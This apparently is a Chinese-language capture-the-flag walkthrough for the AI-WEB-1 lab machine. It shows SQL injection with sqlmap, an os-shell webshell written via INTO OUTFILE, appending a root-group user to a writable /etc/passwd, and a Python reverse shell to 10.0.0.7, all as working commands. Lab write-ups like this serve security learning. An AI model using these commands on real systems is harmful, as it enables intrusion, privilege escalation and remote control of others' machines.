AIWEB1综合靶场通关教程【附靶场环境】 前言如果要进网安交流群的，后台菜单栏点击加群即可（建议微信群），靶场获取后台回复【AIWEB1】下载之后设置为nat模式启动即可，不需要登录靶机复现主机发现访问即可信息收集robots.txt文件访问尝试，原来是什么也没有的，404我们去访问这个上级目录，发现有一个id注入测试语法错误，存在sql注入漏洞抓包sqlmap爆表发现表里什么也没有，换思路没有权限dirb扫一下看看，有一个info.php网站绝对路径禁用的函数，没有禁用eval本地文件包含开启，以及php版本（%00截断，低于5.2），但似乎没什么用这里我们有两种方法方式一通过查找secure_file_priv 的值1、DBA权限，这里我们发现可以对文件进行读写sqlmap -u 'http://10.0.0.84/se3reTdir777/#' -data "uid=1&Operation=%E6%8F%90%E4%BA%A4" -p 'uid' --privileges2、secure_file_priv方式二从phpinfo中的网站绝对路径进行拼接尝试有了绝对允许上传文件的角度路径那么我们就能使用sqlmap获取shellsqlmap获取shell使用sqlmap的oshellosshell原理通过sqlmap -v 5 参数可以查看流量包通过分析，得到sqlmap的osshell原理就是，通过into outfile/into dumpfile写文件的方式进行文件写入然后再进行访问这个上传的写入sqlmap会向这个上传的网站目录写入两个文件1、文件上传木马文件2、命令执行文件文件上传成功后，即可执行命令（与蚁剑不兼容）注意：如果你退出了这个osshell，那么这两个文件都会自动删除，导致执行不了命令这是会话维持中，可以执行命令会话断开断开后尝试执行命令上传成功后，没有找到这个flag.txt文件，应该是没有权限读取10=system('find / -name flag*');查看/etc/passwd权限，发现漏洞，竟然可以读写文件，我们追加一个用户新加用户之前创建一个登录密码perl -le 'print crypt("123456","addedsalt")'新加一个用户，分到root组进行提权echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd靶机发现还有nc反弹shell，查看攻击机ip地址靶机nc发现没有-e参数，反弹不了shell看看靶机有没有python很好，有python，我们使用python反弹shell，攻击机开启监听中间我断网了，ip地址变了一下，之后操作都是这个ip我们尝试使用python反弹shellpython -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.7',80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"如果没有成功，就多试几次我们尝试切换用户，提示必须从终端运行这个问题搞我半天，后来发现可以使用python调用本地shell即终端升级echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py su test 123456模糊查找flag的位置cat 即可